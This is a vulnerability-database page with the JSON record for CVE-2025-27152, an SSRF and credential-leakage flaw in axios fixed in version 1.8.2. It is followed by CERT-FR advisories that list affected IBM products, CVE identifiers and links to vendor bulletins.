Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-27152 (GCVE-0-2025-27152)
Vulnerability from cvelistv5 – Published: 2025-03-07 15:13 – Updated: 2025-03-07 19:32
VLAI?
EPSS
Summary
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
Severity ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-27152",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-07T19:32:00.779211Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T19:32:17.511Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "axios",
"vendor": "axios",
"versions": [
{
"status": "affected",
"version": "\u003c 1.8.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T15:13:15.155Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"name": "https://github.com/axios/axios/issues/6463",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/issues/6463"
}
],
"source": {
"advisory": "GHSA-jr5f-v2jv-69x6",
"discovery": "UNKNOWN"
},
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-27152",
"datePublished": "2025-03-07T15:13:15.155Z",
"dateReserved": "2025-02-19T16:30:47.779Z",
"dateUpdated": "2025-03-07T19:32:17.511Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-27152\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-03-07T16:15:38.773\",\"lastModified\":\"2025-11-25T17:58:17.213\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\"},{\"lang\":\"es\",\"value\":\"axios es un cliente HTTP basado en promesas para el navegador y node.js. El problema ocurre cuando se pasan URL absolutas en lugar de URL relativas al protocolo a axios. Incluso si se configura ?baseURL, axios env\u00eda la solicitud a la URL absoluta especificada, lo que puede provocar una fuga de credenciales y SSRF. Este problema afecta tanto al uso del lado del servidor como del lado del cliente de axios. Este problema se solucion\u00f3 en 1.8.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.30.0\",\"matchCriteriaId\":\"22E658DD-EA2E-454A-BEB1-3B9BC30D017E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndIncluding\":\"1.7.9\",\"matchCriteriaId\":\"2EFCE157-4712-4CC5-8DB4-9ACCC8C1016E\"}]}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/issues/6463\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-27152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-07T19:32:00.779211Z\"}}}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-07T19:32:13.477Z\"}}], \"cna\": {\"title\": \"Possible SSRF and Credential Leakage via Absolute URL in axios Requests\", \"source\": {\"advisory\": \"GHSA-jr5f-v2jv-69x6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.8.2\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/axios/axios/issues/6463\", \"name\": \"https://github.com/axios/axios/issues/6463\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \\u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-03-07T15:13:15.155Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-27152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-07T19:32:17.511Z\", \"dateReserved\": \"2025-02-19T16:30:47.779Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-03-07T15:13:15.155Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
CERTFR-2025-AVI-0746
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling External Authentication Server versions 6.1.0.x antérieures à 6.1.0.3 GA | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.1.0.x antérieures à 6.1.0.2 GA | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.2.0.x antérieures à 6.2.0.2 GA | ||
| IBM | Sterling | Sterling Connect:Direct pour Microsoft Windows versions 6.3.x antérieures à 6.3.0.6 | ||
| IBM | Sterling | Sterling Connect:Direct pour Microsoft Windows versions 6.4.x antérieures à 6.4.0.3 | ||
| IBM | Db2 | Db2 Bridge versions antérieures à 1.1.1 | ||
| IBM | Cognos Dashboards | Cognos Command Center versions 10.2.4.1 et 10.2.5 antérieures à 10.2.5 FP1 IF1 | ||
| IBM | QRadar | QRadar SIEM versions 7.5.0 antérieures à QRadar 7.5.0 UP13 IF01 | ||
| IBM | QRadar | QRadar Incident Forensics versions 7.5.0 antérieures à QIF 7.5.0 UP13 IF01 | ||
| IBM | WebSphere | WebSphere Remote Server versions 9.1, 8.0 et 8.5 sans le dernier correctif de sécurité | ||
| IBM | Cognos Dashboards | Cognos Dashboards on Cloud Pak for Data versions 5.x antérieures à 5.2.1 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling External Authentication Server versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.3 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.2 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.2.0.x ant\u00e9rieures \u00e0 6.2.0.2 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour Microsoft Windows versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.6",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour Microsoft Windows versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.3",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Bridge versions ant\u00e9rieures \u00e0 1.1.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Command Center versions 10.2.4.1 et 10.2.5 ant\u00e9rieures \u00e0 10.2.5 FP1 IF1",
"product": {
"name": "Cognos Dashboards",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.0 ant\u00e9rieures \u00e0 QRadar 7.5.0 UP13 IF01",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Incident Forensics versions 7.5.0 ant\u00e9rieures \u00e0 QIF 7.5.0 UP13 IF01",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Remote Server versions 9.1, 8.0 et 8.5 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Dashboards on Cloud Pak for Data versions 5.x ant\u00e9rieures \u00e0 5.2.1",
"product": {
"name": "Cognos Dashboards",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2025-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24789"
},
{
"name": "CVE-2022-50020",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50020"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-50349",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50349"
},
{
"name": "CVE-2025-46835",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46835"
},
{
"name": "CVE-2024-57980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57980"
},
{
"name": "CVE-2024-43420",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43420"
},
{
"name": "CVE-2025-49794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49794"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2025-27614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27614"
},
{
"name": "CVE-2022-49111",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49111"
},
{
"name": "CVE-2025-1470",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1470"
},
{
"name": "CVE-2022-49058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49058"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2024-52006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52006"
},
{
"name": "CVE-2025-4373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4373"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2025-48385",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48385"
},
{
"name": "CVE-2025-48060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48060"
},
{
"name": "CVE-2024-50154",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50154"
},
{
"name": "CVE-2025-27613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27613"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2022-49136",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49136"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2022-49846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49846"
},
{
"name": "CVE-2019-17543",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17543"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2025-48384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48384"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1471"
},
{
"name": "CVE-2025-38079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38079"
},
{
"name": "CVE-2025-20012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20012"
},
{
"name": "CVE-2025-7425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7425"
},
{
"name": "CVE-2025-37738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37738"
},
{
"name": "CVE-2024-53920",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53920"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2025-52520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52520"
},
{
"name": "CVE-2024-52533",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52533"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-2697",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2697"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-21928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21928"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-1494",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1494"
},
{
"name": "CVE-2025-1994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1994"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2025-24495",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24495"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2022-49977",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49977"
},
{
"name": "CVE-2024-54661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54661"
},
{
"name": "CVE-2025-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37890"
},
{
"name": "CVE-2025-22020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22020"
},
{
"name": "CVE-2025-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27533"
},
{
"name": "CVE-2025-6021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6021"
},
{
"name": "CVE-2025-55668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-58002",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58002"
},
{
"name": "CVE-2025-32415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32415"
},
{
"name": "CVE-2025-21905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21905"
},
{
"name": "CVE-2024-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23337"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-38052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38052"
},
{
"name": "CVE-2025-2900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2900"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2019-5427",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-5427"
},
{
"name": "CVE-2022-49788",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49788"
},
{
"name": "CVE-2025-20623",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20623"
},
{
"name": "CVE-2025-48997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48997"
},
{
"name": "CVE-2020-5260",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5260"
},
{
"name": "CVE-2025-49796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49796"
},
{
"name": "CVE-2025-21919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21919"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-34397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34397"
},
{
"name": "CVE-2025-21991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21991"
},
{
"name": "CVE-2025-7338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
},
{
"name": "CVE-2025-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24790"
},
{
"name": "CVE-2024-45332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45332"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23150"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0746",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-08-29T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243411",
"url": "https://www.ibm.com/support/pages/node/7243411"
},
{
"published_at": "2025-08-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242915",
"url": "https://www.ibm.com/support/pages/node/7242915"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243372",
"url": "https://www.ibm.com/support/pages/node/7243372"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242159",
"url": "https://www.ibm.com/support/pages/node/7242159"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243146",
"url": "https://www.ibm.com/support/pages/node/7243146"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242161",
"url": "https://www.ibm.com/support/pages/node/7242161"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243144",
"url": "https://www.ibm.com/support/pages/node/7243144"
},
{
"published_at": "2025-08-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243011",
"url": "https://www.ibm.com/support/pages/node/7243011"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243373",
"url": "https://www.ibm.com/support/pages/node/7243373"
}
]
}
CERTFR-2025-AVI-0562
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | DB2 Data Management Console versions 3.1.x postérieures à 3.1.11 et antérieures à 3.1.13.1 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 FP6 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.1.1 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Sterling | Sterling Transformation Extender version 11.0.0.0 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.0.2 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 FP1 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.2.1 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 14.10.x antérieures à 14.10.xC11W2 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct File Agent versions 1.4.0.x antérieures à 1.4.0.4 | ||
| IBM | Sterling | Sterling Transformation Extender versions 11.0.1.x antérieures à 11.0.1.1 sans le correctif de sécurité APAR PH67016 | ||
| IBM | Db2 | DB2 Data Management Console pour CPD versions antérieures à 5.1.2 | ||
